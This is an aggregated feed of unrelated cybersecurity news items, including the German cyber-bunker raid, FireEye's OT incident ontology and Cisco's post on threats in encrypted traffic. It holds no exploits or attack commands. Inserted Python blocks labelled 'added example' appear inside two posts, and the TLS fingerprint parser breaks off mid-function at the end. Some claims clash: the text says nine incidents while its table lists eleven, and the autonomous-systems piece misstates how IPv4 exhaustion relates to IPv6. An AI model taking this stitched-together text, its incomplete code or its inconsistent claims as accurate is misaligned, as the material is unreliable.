“The establishment of BlackBerry Labs is the latest in a series of strategic moves we’ve taken to ensure our customers are protected across all endpoints and verticals in the new IoT,” said Eagan in a press release. “Today’s cybersecurity industry is rapidly advancing and BlackBerry Labs will operate as its own business unit solely focused on innovating and developing the technologies of tomorrow that will be necessary for our sustained competitive success, from A to Z; Artificial Intelligence to Zero-Trust environments. We believe this highly experienced team will allow us to remain nimble, engaged and, above all else, proactive in our efforts to be the most trusted security software leader in the market.”

While the overarching scope will be researching and developing security solutions, BlackBerry said initial work will be specifically focused on machine learning approaches to security in partnership with the company’s existing Cylance, Enterprise, and QNX business units.

Cloudflare’s WAF rule to protect against vBulletin RCE (CVE-2019-16759)

Cloudflare is a well-known company that offers a wide range of internet services aimed at keeping your website safe. Cloudflare has recently added a new managed rule to its WAF to help protect against the vBulletin Remote Code Execution exploit (CVE-2019-16759). RCE (Remote ...

The post Cloudflare’s WAF rule to protect against vBulletin RCE (CVE-2019-16759) appeared first on HackingVision.

German Police Bust Dark Web Hosting Cyber-Bunker Business


Hundreds of servers used to support child pornography, cybercrime, and the sale of illegal drugs have been seized in a police raid on a former NATO bunker in Germany.

German authorities arrested thirteen people between the ages of 20 and 59 on Friday after busting up a dark web hosting operation being run from a heavily fortified five-floor military bunker in the peaceful riverside town of Traben-Trarbach. 

After breaking through an iron door to gain access to the temperature-controlled bunker, 600 police searched the 1.3-acre premises and found around 200 servers stored in stacks together with disks, mobile phones, documents, and a large sum of cash. 

A 59-year-old Dutchman, who purchased the bunker in 2013, is thought to be the owner and operator of the business, which offered secured "bulletproof" website hosting to illegal businesses and concealed their activities from authorities. Sites linked to the bunker include illegal online drug stores Cannabis Road, Orange Chemicals, and Wall Street Market, formerly the second-largest global marketplace for drugs, where users could also buy hacking tools and financial-theft ware.

Suspects arrested in connection with the raid are thought to have links to organized crime and are likely to be named as accessories to over 250,000 offenses involving money counterfeiting, drugs, data mining, forged documents, and the distribution of child pornography.

Seven of the people arrested are being held in custody, with two thought to hold previous convictions for running a similar business out of a former military bunker in the Netherlands, which was sold as CyberBunker. 

Regional criminal police chief Johannes Kunz said, "I think it’s a huge success . . . that we were able at all to get police forces into the bunker complex, which is still secured at the highest military level. We had to overcome not only real, or analog, protections; we also cracked the digital protections of the data center."

Since the operation of the bunker hosting service isn't illegal per se, German authorities must prove the suspects arrested were aware of the illegal behavior of the hosted businesses to secure a conviction. Evaluating the stored data to determine this could take anywhere from months to years. 

Commenting on the raid, Vectra's head of security, Chris Morales, said: "We need to see more collaboration like this which involves the coordination between digital forensics and investigation and physical police enforcement. I applaud all of the German law enforcement agencies involved on a job well done."

How to Explore Autonomous Systems in Business Network and the Way Hackers use it

The ‘net’ in ‘internet’ is a network. Technically, it is also an internetwork: a network of computer networks. Still confused?

We refer to these independent computer networks as autonomous systems when we talk about routing. A single, independent system routes packets internally, while packets traveling through the internet typically pass through many autonomous systems.

Think of it this way: internet routing happens between independent systems, not between individual PCs. Each AS receives its own unique 16-bit identification number, the ASN, assigned through the Internet Assigned Numbers Authority (IANA).

Smaller networks such as your home network have a much simpler relationship with the internet. When you buy an internet service plan, the ISP gives you a DSL or one of those old-school cable modems that lets you reach the “whole web” through a router. The router simply has your local computers and devices on one side and the entire internet on the other.

So why build Autonomous systems?

For most people, that is all they need to know about how the internet operates. But if you want to avoid being tied to a single internet provider, or your connection is not as good as you need it to be, you build your own AS to ‘expand your possible parameters,’ as they say.

The fact that you have your own AS can be useful to your network in various respects, including:

  • IP address portability
  • Flexible network administration
  • Direct interaction with IXPs
  • An individual network identity for external and internal purposes
  • Full traffic control
  • The ability to run BGP with your own ASN

How to build an Autonomous system

Creating an autonomous system is not that hard and only requires a few steps. If you want to build your own independent system, this is what you do:

Step 1: Found a company. An AS has to be registered by a legal entity, so start brainstorming a business name.

Step 2: Get yourself a public address block. This might be the toughest step. You must obtain a public IP address block that is large enough to advertise over BGP. Free IPv4 addresses are no longer available, so you must purchase an IPv6 block, which can be quite expensive.

Step 3: Find peers. The tricky part of the internet is that you need to be connected to some part of it in order to do anything. If you connect to only one other AS, you do not strictly need to run BGP. If you do run it, you can use a private autonomous system number that your upstream provider can easily replace with its own. They will then propagate your routes to the rest of the internet.

Step 4: Get a router that can handle the entire internet routing table. This is a powerful router that you cannot buy at your local store. One alternative is to build the router yourself from a server running a router operating system.

How AS is used by Hackers

When a business expands and invests in its own AS, security concerns about your network and traffic come into play. You likely have a lot of private data that you want to keep private. Hackers hunt for data, and with sufficient skill they can get into your network, intercept your packets, and gain remote access to all your PCs to install malicious code on your servers.

It is not difficult to find the owner of an IP range. Many services, such as WHOIS and CIDR lookups, provide extensive data about organisations. This information can help identify links between businesses, map the attack surface, and aim a nasty DDoS attack at a target.

This is where the cyber security industry comes in. There are tools that reveal vulnerabilities and help remove malware from your network. However, few of these tools are effectively designed to prevent attacks.

The up-and-coming cyber security company Spyse is building a solution based on mass collection of data from the internet. Spyse uses this data to produce a comprehensive network vulnerability map. The tool helps security experts predict vulnerabilities, stay ahead of hackers, and prevent future threats to their systems.

Spyse recently published several tools for security engineers, pentesters, sysadmins and business analysts in beta. ASlookup is one of their latest creations; it lets you monitor the infrastructure of your organization, network or company.

The Spyse team is aware that it is best to avoid threats in advance; their services thus help you determine the attack surface and recognize vulnerabilities prior to exposure. Moreover, they give all fresh users 3 free credits.

The post How to Explore Autonomous Systems in Business Network and the Way Hackers use it appeared first on .

Getting Started With AppLocker

John Strand // I have quite a few calls with customers who do not know where to begin when it comes to application whitelisting. Often, the approach some organizations take is to try and implement full application whitelisting on every single application across their entire environment.  While this goal is fun and seems like a […]

The post Getting Started With AppLocker appeared first on Black Hills Information Security.

Hiding a Data Breach Can Derail an Acquisition


Companies can drive down their value by hiding or mishandling data breaches, according to research by the world's largest nonprofit association of certified cybersecurity professionals, (ISC)².

Researchers questioned 250 mergers and acquisitions (M&A) experts based in the US to determine how important a company's cybersecurity program and breach history is in deciding its value ahead of a potential purchase. 

Findings shared in the Cybersecurity Assessments in Mergers and Acquisitions report, released today, revealed that 49% of M&A experts have seen deals derailed after due diligence brought an undisclosed breach to light. 

Researchers also found that 86% of respondents said if a company publicly reported a breach of customer or other critical data in its past, it would detract from the acquisition price assigned. However, if that breach was satisfactorily addressed and fixed, and any potential fines were already paid, 88% said it would minimize the negative impact to the overall valuation.

"While every company needs to make their own decisions regarding proper data breach disclosure policies, the research clearly shows that in the context of a possible sale, not being transparent about past breaches can literally kill a potential deal, or can seriously affect the ultimate sale price," John McCumber, director of cybersecurity advocacy, North America, for (ISC)², told Infosecurity Magazine.

Having strong cybersecurity can give a company the edge over a competitor. Researchers found that 77% of experts had recommended a particular company be acquired over another because of the strength of its cybersecurity program.

The report is a reality check for companies who think a lackluster approach to cybersecurity won't diminish their stock. All respondents stated that cybersecurity audits are now a standard practice in arriving at a dollars and cents valuation, and 96% said that cybersecurity readiness factors into the calculation when they are assessing the overall monetary value of a potential acquisition target.

"While most companies would rather not experience a breach in the first place, the study shows that those who deal with one, handle it well, and make adjustments to policies in order to limit their chances of a recurrence are looked at more favorably by potential buyers than those who seem doomed to repeat their mistakes," McCumber told Infosecurity Magazine.

"Each deal is different. But what our report indicates is that in order to maximize the value of a deal, the acquisition target should ideally self-audit their cybersecurity program and readiness level in advance."

The FireEye OT-CSIO: An Ontology to Understand, Cross-Compare, and Assess Operational Technology Cyber Security Incidents

The FireEye Operational Technology Cyber Security Incident Ontology (OT-CSIO)

While the number of threats to operational technology (OT) has significantly increased since the discovery of Stuxnet – driven by factors such as the growing convergence with information technology (IT) networks and the increasing availability of OT information, technology, software, and reference materials – we have observed only a small number of real-world OT-focused attacks. The limited sample size of well-documented OT attacks and the lack of analysis from a macro-level perspective represent a challenge for defenders and security leaders trying to make informed security decisions and risk assessments.

To help address this problem, FireEye Intelligence developed the OT Cyber Security Incident Ontology (OT-CSIO) to aid with communication with executives, and provide guidance for assessing risks. We highlight that the OT-CSIO focuses on high-level analysis and is not meant to provide in-depth insights into the nuances of each incident.

Our methodology evaluates four categories, which are targeting, impact, sophistication, and affected equipment architecture based on the Purdue Model (Table 7). Unlike other methodologies, such as MITRE's ATT&CK Matrix, FireEye Intelligence's OT-CSIO evaluates only the full aggregated attack lifecycle and the ultimate impacts. It does not describe the tactics, techniques, and procedures (TTPs) implemented at each step of the incident. Table 1 describes the four categories. Detailed information about each class is provided in Appendix 1.


Table 1: Categories for FireEye Intelligence's OT-CSIO

The OT-CSIO In Action

In Table 2 we list nine real-world incidents impacting OT systems categorized according to our ontology. We highlight that the ontology only reflects the ultimate impact of an incident, and it does not account for every step throughout the attack lifecycle. As a note, we cite public sources where possible, but reporting on some incidents is available to FireEye Threat Intelligence customers only.

Incident | Target | Sophistication | Impact | Impacted Equipment
--- | --- | --- | --- | ---
Maroochy Shire Sewage Spill (2000) | ICS-targeted | Medium | Disruption | Zone 3
Stuxnet (2011) | ICS-targeted | High | Destruction | Zones 1-2
Shamoon (2012) | ICS-targeted | Low | Destruction | Zones 4-5
Ukraine Power Outage (2015) | ICS-targeted | Medium | Disruption, Destruction | Zone 2
Ukraine Power Outage (2016) | ICS-targeted | High | Disruption | Zones 0-3
WannaCry Infection on HMIs (2017) | Non-targeted | Low | Disruption | Zones 2-3
TEMP.Isotope Reconnaissance Campaign (2017) | ICS-targeted | Low | Data Theft | Zones 2-4
TRITON Attack (2017) | ICS-targeted | High | Disruption (likely building destructive capability) | Zone Safety, 1-5
Cryptomining Malware on European Water Utility (2018) | Non-targeted | Low | Degradation | Zones 2-3
Financially Motivated Threat Actor Accesses HMI While Searching for POS Systems (2019) | Non-targeted | Low | Compromise | Zones 2-3
Portable Executable File Infecting Malware Impacting Windows-based OT assets (2019) | Non-targeted | Low | Degradation | Zones 2-3

Table 2: Categorized samples using the OT-CSIO

The OT-CSIO Matrix Facilitates Risk Management and Analysis

Risk management for OT cyber security is currently a big challenge given the difficulty of assessing and communicating the implications of high-impact, low-frequency events. Additionally, multiple risk assessment methodologies rely on background information to determine case scenarios. However, the quality of this type of analysis depends on the background information that is applied to develop the models or identify attack vectors. Taking this into consideration, the following matrix provides a baseline of incidents that can be used to learn about past cases and facilitate strategic analysis about future case scenarios for attacks that remain unseen, but feasible.


Table 3: The FireEye OT-CSIO Matrix

As Table 3 illustrates, we have only identified examples for a limited set of OT cyber security incident types. Additionally, some cases are very unlikely to occur. For example, medium- and high-sophistication non-targeted incidents remain unseen, even if feasible. Similarly, medium- and high-sophistication data compromises on OT may remain undetected. While this type of activity may be common, data compromises are often just a component of the attack lifecycle, rather than an end goal.
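As an added example (not FireEye's code), Table 2 encoded as data, the targeting-by-sophistication-by-impact matrix derived from it, and a listing of the cells with no documented incident, which is the “feasible but unseen” set the paragraph above describes. The ordinal ordering of the impact classes follows the order the post lists them in, and the simple risk rank is an assumption drawn from the post's rule that higher sophistication and impact generally mean higher risk.

```python
from collections import defaultdict
from dataclasses import dataclass

# Class values taken from Appendix 1 and Table 2; ordering of IMPACT is assumed
# from the order in which the post lists the five impact classes.
TARGETING = ["ICS-targeted", "Non-targeted"]
SOPHISTICATION = ["Low", "Medium", "High"]
IMPACT = ["Compromise", "Data Theft", "Degradation", "Disruption", "Destruction"]


@dataclass(frozen=True)
class Incident:
    name: str
    year: int
    target: str
    sophistication: str
    impacts: tuple   # an incident may carry more than one impact class (Ukraine 2015)
    zones: str


# Table 2 transcribed as data.
INCIDENTS = [
    Incident("Maroochy Shire Sewage Spill", 2000, "ICS-targeted", "Medium", ("Disruption",), "Zone 3"),
    Incident("Stuxnet", 2011, "ICS-targeted", "High", ("Destruction",), "Zones 1-2"),
    Incident("Shamoon", 2012, "ICS-targeted", "Low", ("Destruction",), "Zones 4-5"),
    Incident("Ukraine Power Outage", 2015, "ICS-targeted", "Medium", ("Disruption", "Destruction"), "Zone 2"),
    Incident("Ukraine Power Outage", 2016, "ICS-targeted", "High", ("Disruption",), "Zones 0-3"),
    Incident("WannaCry Infection on HMIs", 2017, "Non-targeted", "Low", ("Disruption",), "Zones 2-3"),
    Incident("TEMP.Isotope Reconnaissance Campaign", 2017, "ICS-targeted", "Low", ("Data Theft",), "Zones 2-4"),
    Incident("TRITON Attack", 2017, "ICS-targeted", "High", ("Disruption",), "Zone Safety, 1-5"),
    Incident("Cryptomining Malware on European Water Utility", 2018, "Non-targeted", "Low", ("Degradation",), "Zones 2-3"),
    Incident("Financially Motivated Threat Actor Accesses HMI", 2019, "Non-targeted", "Low", ("Compromise",), "Zones 2-3"),
    Incident("PE File Infecting Malware on Windows-based OT Assets", 2019, "Non-targeted", "Low", ("Degradation",), "Zones 2-3"),
]


def validate(inc):
    """Reject values outside the ontology's classes so the matrix stays well-formed."""
    if (inc.target not in TARGETING or inc.sophistication not in SOPHISTICATION
            or any(i not in IMPACT for i in inc.impacts)):
        raise ValueError(f"{inc.name} ({inc.year}): value outside the OT-CSIO classes")


def build_matrix(incidents):
    """Map each (target, sophistication, impact) cell to the incidents documented in it."""
    cells = defaultdict(list)
    for inc in incidents:
        validate(inc)
        for impact in inc.impacts:
            cells[(inc.target, inc.sophistication, impact)].append(f"{inc.name} ({inc.year})")
    return cells


def unobserved_cells(incidents):
    """Cells of the full 2 x 3 x 5 matrix with no documented example: feasible but unseen scenarios."""
    cells = build_matrix(incidents)
    return [(t, s, i) for t in TARGETING for s in SOPHISTICATION for i in IMPACT
            if (t, s, i) not in cells]


def risk_rank(inc):
    """Assumed ordinal rank: sophistication index plus the index of the incident's highest impact class."""
    return SOPHISTICATION.index(inc.sophistication) + max(IMPACT.index(i) for i in inc.impacts)


if __name__ == "__main__":
    for cell, names in sorted(build_matrix(INCIDENTS).items()):
        print(cell, "->", "; ".join(names))
    print(f"{len(unobserved_cells(INCIDENTS))} cells have no documented incident")
    for inc in sorted(INCIDENTS, key=risk_rank, reverse=True):
        print(f"{risk_rank(inc)}  {inc.name} ({inc.year})")
```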

How to Use the OT-CSIO Matrix

The OT-CSIO Matrix presents multiple benefits for the assessment of OT threats from a macro level perspective given that it categorizes different types of incidents and invites further analysis on cases that have not yet been documented but may still represent a risk to organizations. We provide some examples on how to use this ontology:

  • Classify different types of attacks and develop cross-case analysis to identify differences and similarities. Knowledge about past incidents can be helpful to prevent similar scenarios and to think about threats that have not been evaluated by an organization.
  • Leverage the FireEye OT-CSIO Matrix for communication with executives by sharing a visual representation of different types of threats, their sophistication and possible impacts. This tool can make it easier to communicate risk despite the limited data available for high-impact, low-frequency events. The ontology provides an alternative to assess risk for different types of incidents based on the analysis of sophistication and impact, where increased sophistication and impact generally equates to higher risk.
  • Develop additional case scenarios to foresee threats that have not been observed yet but may become relevant in the future. Use this information as support while working on risk assessments.

Outlook

FireEye Intelligence's OT-CSIO seeks to compile complex incidents into practical diagrams that facilitate communication and analysis. Categorizing these events is useful for visualizing the full threat landscape, gaining knowledge about previously documented incidents, and considering alternative scenarios that have not yet been seen in the wild. Given that the field of OT cyber security is still developing, and the number of well-documented incidents is still low, categorization represents an opportunity to grasp tendencies and ultimately identify security gaps.

Appendix 1: OT-CSIO Class Definitions

Target

This category comprises cyber incidents that target industrial control systems (ICS) and non-targeted incidents that collaterally or coincidentally impact ICS, such as ransomware.


Table 4: Target category

Sophistication

Sophistication refers to the technical and operational sophistication of attacks. There are three levels of sophistication, which are determined by the analyst based on the following criteria.


Table 5: Sophistication category

Impact

The ontology reflects impact on the process or systems, not the resulting environmental impacts. There are five classes in this category, including data compromise, data theft, degradation, disruption, and destruction.


Table 6: Impact category

Impacted Equipment

This category is divided based on FireEye Intelligence's adaptation of the Purdue Model. For the purpose of this ontology, we add an additional zone for safety systems.


Table 7: Impacted equipment

Darknet ‘Cyber Bunker’ Server Hosted in Germany

German authorities said on Friday that they had busted a network hosting illegal darknet trading platforms, stolen data and child pornography on servers in an old NATO bunker.

In a series of raids on Thursday targeting the operators of the “Bulletproof Hoster” service, located in the so-called “Cyber Bunker,” seven suspects were arrested, police and prosecutors said.

The servers hosted, or provided internet infrastructure for, illegal websites that also stored stolen data and forged documents and were used for large-scale cyber attacks.

Thirteen suspected participants, 12 men and one woman aged 20 to 59, reportedly set up and ran powerful servers inside a NATO bunker in the Rhineland-Palatinate town of Traben-Trarbach.

Four Dutch, two Germans, and one Bulgarian were held in custody.

Several hundred police officers took part in raids in Germany and other European countries, seizing 200 servers, numerous data carriers and mobile phones, and a considerable amount of money.

The websites included the ‘Wall Street Market’ platform, once the second-largest darknet drug marketplace in the world, which investigators took down earlier this year.

A server located in the cyber bunker was also linked to an internet attack that affected 1.25 million routers of the German provider Deutsche Telekom in November 2016, the Federal Public Prosecutor’s Office said.

The servers also included “Fraudsters” and “lifestylepharma” as well as “Cannabis Road.”

The post Darknet ‘Cyber Bunker’ Server Hosted in Germany appeared first on .

Our World in Transition and Our Future Demands

October is Cybersecurity Awareness Month and for me, it’s a time to reflect on where we’ve been and how far we’ve come, study the trends and challenges we face today, and look ahead to the next generation of opportunities facing not only the security community, but society at large.

In my more than 30 years in the security industry, it’s been interesting to see how technology has evolved and changed the world. Security started off as a ‘systems’ conversation. Now, technology touches everyone’s lives, and as a result, cybersecurity affects us all – individuals, businesses, cities, countries, our global community.

From Use to Reliance

During our lifetimes, we’ve shifted from using technology to, in very subtle ways, becoming reliant on it. Whether we realize it or not, these subtleties have made us dependent on technology. The notion of ‘always on’ access to data is highly disruptive to us when we don’t have it. Take maps for example: using a printed map is foreign to us today, and when the maps on our devices don’t work, we’re lost, literally.

When technology is unavailable, in many respects we feel ‘out of the loop’ and behind in knowing what’s going on. There’s a lagging indicator that says, ‘Now that we have access to current information, we always expect this level of connectivity – we depend on it.’ That reliance makes securing the data and the systems that deliver it to us that much more vital.

A Confluence of Change – All in Three Years

Since 2017, three major transitions have occurred that illustrate how complicated cybersecurity has become for us all globally. These transitions have caused security professionals to feel the pressure and scrutiny from a number of organizations that have upped their games. They’re having to catch up to a confluence of changes, all occurring at the same time:

1. Technology

Prior to 2017, IT predominantly built and ran an organization’s technology infrastructure, spending on security and hoping it works, relying on best-of-breed products, and managing it all reactively.

We all needed cybersecurity, but how could we net the best results – the greatest level of efficacy – from the solutions we purchased? Exactly how much value are we getting when spending on a solution? Is it all integrated as a best strategy or are we simply buying technology from the leading brand name or best advertised?

Today, leading IT teams build, buy and run security, use a ‘best-of-integrated’ architecture approach and emphasize visibility, controls, measures and proactive approaches to security that drive efficacy and value.

2. Laws, Regulations, and Customer Requirements

This transition shows the increasing influence that laws, regulations and customer requirements have on a technology or service provider to its clients, and in turn, to their customers, citizens, colleagues, families and friends.

The formalization of laws and regulations – from the EU-NIS Directive to GDPR to the Australian Government Protective Security Policy Framework to the California Consumer Privacy Act, to name a few – has driven greater scrutiny and reform. It’s accelerated substantially in a short period of time, from ‘do-it-yourself’ disharmonious regulations and rules to a set of country, inter-country and international standards.

Now corporate and government leaders across the international community are being held accountable. This transition from varying self-rule and self-regulation to accountability, breach reporting and disclosure highlights the implications of mishandling data and privacy through significant fines and executive firings.

In many respects, it’s been a long time coming. What’s interesting is that now that it’s here, it’s caught many off-guard – and it’s by no means slowing down.

3. Internal Oversight

When I started in InfoSec, security was mainly an engineering or computer science discipline. The security team was often avoided so that they couldn’t suppress innovation because of security concerns. The business was self-governing with inconsistent levels of oversight.

Today, internal reporting to and oversight by executive leadership, the CEO, the board of directors and shareholders are becoming standard practice to ensure proper governance. In part, it is a response to the regulatory landscape and the need for higher levels of accountability and oversight from within. It’s also based on the criticality of technology moving from something we use to something we rely on to deliver a service.

All three of these transitions came to the fore in too short a period of time for anyone to know how to effectively react, govern and solve for them. By the way, we’re all going through this and determining our own strategies to face the challenges, net the value they deliver, and understand how to be safe and secure in and around it all.

Our Future Demands

Today, there are about 4 billion internet users globally – all told, about 10X what it was in 2000. We’re in a world where everything is being connected and generating data. This will have a significant impact on the next few years in particular and an even more substantial one further into the future.

By next year, there will be about 200 billion devices ‘on air,’ which includes cars, telemetry in cities, sensors and a multitude of other connected devices. Two-hundred billion is almost an ephemeral number, but it’s not to be underestimated, because the number of vendors creating IoT-connected technology is probably growing 3-4X every year over the prior year. That’s a trend that I don’t see slowing down any time soon.

By 2021, cybercrime is estimated to be a $6 trillion industry – a very profitable industry, though I don’t recommend it as a career choice. It does illustrate the depth and breadth of the challenge – that it’s an international and global issue that we all have to work together to solve because it’s something that we all face.

Raising the Bar for a More Secure Future

Governments and businesses globally are raising the bar to meet the challenge around product assurance, cloud assurance, IoT, lawful intercept, data protection, privacy and the like. Some 30-odd countries are writing or revising their cybersecurity strategies and each can have profound implications on how data is shared and how systems are built.

So, during Cybersecurity Awareness Month, consider what you can do to make the world more safe and secure, and take action. What can you do as individuals? How are you protecting yourself online and helping your business, colleagues, friends and family to do the same? Each individual act, when taken together, can move us all to a more secure future.

We’re not looking for headlines that show ‘good’ or ‘bad.’ We need trend lines that show that what we’re doing collectively is moving us all towards lower risk. As long as the trend line is going in the right direction, we’re doing what we need to do – and we must all do our part.

For governments, companies and individuals alike, Cisco’s Cybersecurity Awareness Month site offers events, activities and educational content, and ways to get involved. The Cisco Trust Center also offers resources to help you with security, data protection and privacy. Both feature links to security reports, videos, threat intelligence, thought leadership and more that will keep you informed.

McAfee Receives the 2019 Security Excellence Award From IoT Evolution

If you’re like most users, you’ve probably adopted several smart devices into your home over the last few years. Whether it be voice assistants, smart TVs, thermostats, or gaming systems, IoT devices help make our lives easier. But with greater connectivity also comes greater exposure to online threats. However, that doesn’t mean users should avoid using IoT technology altogether. With the help of smart security, users can feel safe and protected as they bring new gadgets into their lives. Solutions like McAfee Secure Home Platform, which is now the winner of the IoT Security Excellence Award, can help users connect with confidence.

Here at McAfee, we know smart security is more important now than ever before. That’s why we work tirelessly to ensure that our solutions provide consumers with the best protection possible. For example, McAfee Secure Home Platform provides automatic protection for the entire home network by automatically securing connected devices through a router with McAfee protection. It’s through the proactive evolution of our products that McAfee Secure Home Platform has received this 2019 IoT Security Excellence Award from IoT Evolution World, the leading publication covering IoT technologies.

The IoT Security Excellence Award celebrates the most innovative products and solutions in the world of IoT. It honors technology empowered by the new availability of information being deduced, inferred, and directly gathered from sensors, systems, and anything else that is supporting better business and personal decisions. Winners of this award are recognized for their innovation in gathering and managing information from connected devices that often are not associated with IoT.

“We are thrilled that McAfee Secure Home Platform has been recognized by IoT Evolution World as a recipient of the 2019 IoT Evolution Security Excellence Award. We continue to prioritize creating solutions that lead with ease of use and first-class protection, in order for consumers to best protect every connected device in their homes.” – Gary Davis, Chief Consumer Security Evangelist at McAfee.

As long as technology continues to evolve, so will the threat landscape. This is what drives us to keep developing leading solutions that help you and your loved ones connect with confidence. Solutions like McAfee Secure Home Platform are leading the charge in providing top home network security while still empowering users to enjoy their smart devices.

To stay updated on the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post McAfee Receives the 2019 Security Excellence Award From IoT Evolution appeared first on McAfee Blogs.

Threats in encrypted traffic

There was a time when the web was open. Quite literally—communications taking place on the early web were not masked in any significant fashion. This meant that it was fairly trivial for a bad actor to intercept and read the data being transmitted between networked devices.

This was especially troublesome when it came to sensitive data, such as password authentication or credit card transactions. To address the risks of transmitting such data over the web, traffic encryption was invented, ushering in an era of protected communication.

Today more than half of all websites use HTTPS. In fact, according to data obtained from Cisco Cognitive Intelligence, the cloud-based machine learning engine behind Stealthwatch—Cisco’s network traffic analysis solution—82 percent of HTTP/HTTPS traffic is now encrypted.

The adoption of encrypted traffic has been a boon for security and privacy. By leveraging it, users can trust that sensitive transactions and communications are more secure. The downside to this increase in encrypted traffic is that it’s harder to separate the good from the bad. As adoption of encrypted traffic has grown, masking what’s being sent back and forth, it’s become easier for bad actors to hide their malicious activity in such traffic.

A brief history of encrypted traffic

The concerns around security and privacy in web traffic originally led Netscape to introduce the Secure Sockets Layer (SSL) protocol in 1995. After a few releases, the Internet Engineering Task Force (IETF) took over the protocol and released subsequent updates under the name “Transport Layer Security” (TLS). While the term SSL is often used informally to refer to both today, the SSL protocol has been deprecated and replaced by TLS.

The TLS protocol works directly with existing protocols and encrypts their traffic. This is where protocols like HTTPS come from: the hypertext transfer protocol (HTTP) is transmitted over SSL/TLS. While HTTPS is by far the most common protocol secured by TLS, other popular protocols, such as SFTP and SMTPS, can take advantage of it. Even lower-level protocols like TCP and UDP can use TLS.

Threat actors follow suit

Attackers go to great pains to get their threats onto systems and networks. The last thing they want after successfully penetrating an organization is to have their traffic picked up by network-monitoring tools. Many threats are now encrypting their traffic to prevent this from happening.

Where standard network-monitoring tools might have been able to quickly identify and block unencrypted traffic in the past, TLS now masks the communications that threats use to operate. In fact, according to data taken from Cognitive Intelligence, 63 percent of all threat incidents discovered by Stealthwatch were discovered in encrypted traffic.

In terms of malicious functionality, there are a number of ways that threats use encryption. From command-and-control (C2) communications, to backdoors, to exfiltrating data, attackers consistently use encryption to hide their malicious traffic.

Botnets

By definition, a botnet is a group of Internet-connected, compromised systems. Generally, the systems in a botnet are connected in a client-server or a peer-to-peer configuration. Either way, the malicious actors usually leverage a C2 system to facilitate the passing of instructions to the compromised systems.

Common botnets such as Sality, Necurs, and Gamarue/Andromeda have all leveraged encryption in their C2 communications to remain hidden. The malicious activity carried out by botnets includes downloading additional malicious payloads, spreading to other systems, performing distributed-denial-of-service (DDoS) attacks, sending spam, and other malicious activities.

Botnets mask C2 traffic with encryption.

RATs

The core purpose of a RAT is to allow an attacker to monitor and control a system remotely. Once a RAT manages to implant itself into a system, it needs to phone home for further instructions. RATs require regular or semi-regular connections to the internet, and often use a C2 infrastructure to perform their malicious activities.

RATs often attempt to take administrative control of a computer and/or steal information from it, ranging from passwords, to screenshots, to browser histories. The RAT then sends the stolen data back to the attacker.

Most of today’s RATs use encryption in order to mask what is being sent back and forth. Some examples include Orcus RAT, RevengeRat, and some variants of Gh0st RAT.

RATs use encryption when controlling a computer.

Cryptomining

A cryptocurrency miner establishes a TCP connection between the computer it’s running on and a server. Over this connection, the computer regularly receives work from the server, processes it, and sends the results back to the server. Maintaining these connections is critical for cryptomining; without them the computer would not be able to verify its work.

Given the length of these connections, their importance, and the chance that they can be identified, malicious cryptomining operations often ensure these connections are encrypted.

It’s worth noting that encryption here can apply to any type of cryptomining, both deliberate and malicious in nature. As we covered in our previous Threat of the Month entry on malicious cryptomining, the real difference between these two types of mining is consent.

Miners transfer work back and forth to a server.

Banking trojans

In order for a banking trojan to operate, it has to monitor web traffic on a compromised computer. To do that, some banking trojans siphon web traffic through a malicious proxy or exfiltrate data to a C2 server.

To keep this traffic from being discovered, some banking trojans have taken to encrypting this traffic. For instance, the banking trojan IcedID uses SSL/TLS to send stolen data. Another banking trojan called Vawtrak masks its POST data traffic by using a special encoding scheme that makes it harder to decrypt and identify.

Banking trojans encrypt the data they’re exfiltrating.


Ransomware

The best-known use of encryption in ransomware is obviously when it takes personal files hostage by encrypting them. However, ransomware threats often use encryption in their network communication as well. In particular, some ransomware families encrypt the distribution of decryption keys.

How to spot malicious encrypted traffic

One way to catch malicious encrypted traffic is through a technique called traffic fingerprinting. To leverage this technique, monitor the encrypted packets traveling across your network and look for patterns that match known malicious activity. For instance, the connection to a well-known C2 server can have a distinct pattern, or fingerprint. The same applies to cryptomining traffic or well-known banking trojans.

However, this doesn’t catch all malicious encrypted traffic, since bad actors can simply insert random or dummy packets into their traffic to mask the expected fingerprint. In these cases, other detection techniques are required, such as machine learning algorithms that can identify more complicated malicious connections. Threats may still manage to evade some machine learning detection methods, so implementing a layered approach, covering a wide variety of techniques, is recommended.

In addition, consider the following:

  • Stealthwatch includes Encrypted Traffic Analytics. This technology collects network traffic and uses machine learning and behavioral modeling to detect a wide range of malicious encrypted traffic, without any decryption.
  • The DNS protection technologies included in Cisco Umbrella can prevent connections to malicious domains, stopping threats before they’re even able to establish an encrypted connection.
  • An effective endpoint protection solution, such as AMP for Endpoints, can also go a long way towards stopping a threat before it starts.
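As an added example of the traffic-fingerprinting idea above (not Cisco’s code, and not how Stealthwatch implements it), the following Python parses a TLS ClientHello, derives a simplified JA3-style fingerprint from the version, cipher suites and extension types, and checks it against a watchlist. The ClientHello bytes and the watchlist entry are constructed placeholders, not values from any real client or threat feed.

```python
import hashlib
import struct

# GREASE values (RFC 8701) vary per connection and must be dropped before
# fingerprinting, or the same client would never match its own fingerprint.
GREASE = {0x0A0A + i * 0x1010 for i in range(16)}

# Constructed ClientHello: TLS 1.2, three cipher suites, SNI + sig_algs + ALPN.
SAMPLE_CLIENT_HELLO = bytes.fromhex(
    "16 03 01 00 5e"                      # record: handshake, legacy version 3.1, len 94
    "01 00 00 5a"                         # handshake: ClientHello, len 90
    "03 03"                               # client_version: TLS 1.2
    + "11" * 32 +                         # client random (constructed, fixed bytes)
    "00"                                  # session_id length 0
    "00 06 c0 2b c0 2f 00 2f"             # cipher_suites: 3 suites
    "01 00"                               # compression_methods: null only
    "00 2b"                               # extensions length 43
    "00 00 00 10 00 0e 00 00 0b" + b"example.com".hex() +  # server_name (SNI)
    "00 0d 00 04 00 02 04 03"             # signature_algorithms
    "00 10 00 0b 00 09 08" + b"http/1.1".hex()             # ALPN
)


def _u16(buf: bytes, pos: int) -> int:
    return struct.unpack("!H", buf[pos:pos + 2])[0]


def parse_client_hello(data: bytes) -> dict:
    """Parse the TLS record and the ClientHello fields the fingerprint uses."""
    if len(data) < 5 or data[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    hs = data[5:5 + _u16(data, 3)]
    if len(hs) < 4 or hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    body_len = int.from_bytes(hs[1:4], "big")
    body = hs[4:4 + body_len]
    if len(body) != body_len:
        raise ValueError("truncated ClientHello")
    try:
        pos = 0
        version = _u16(body, pos); pos += 2
        pos += 32                                  # skip client random
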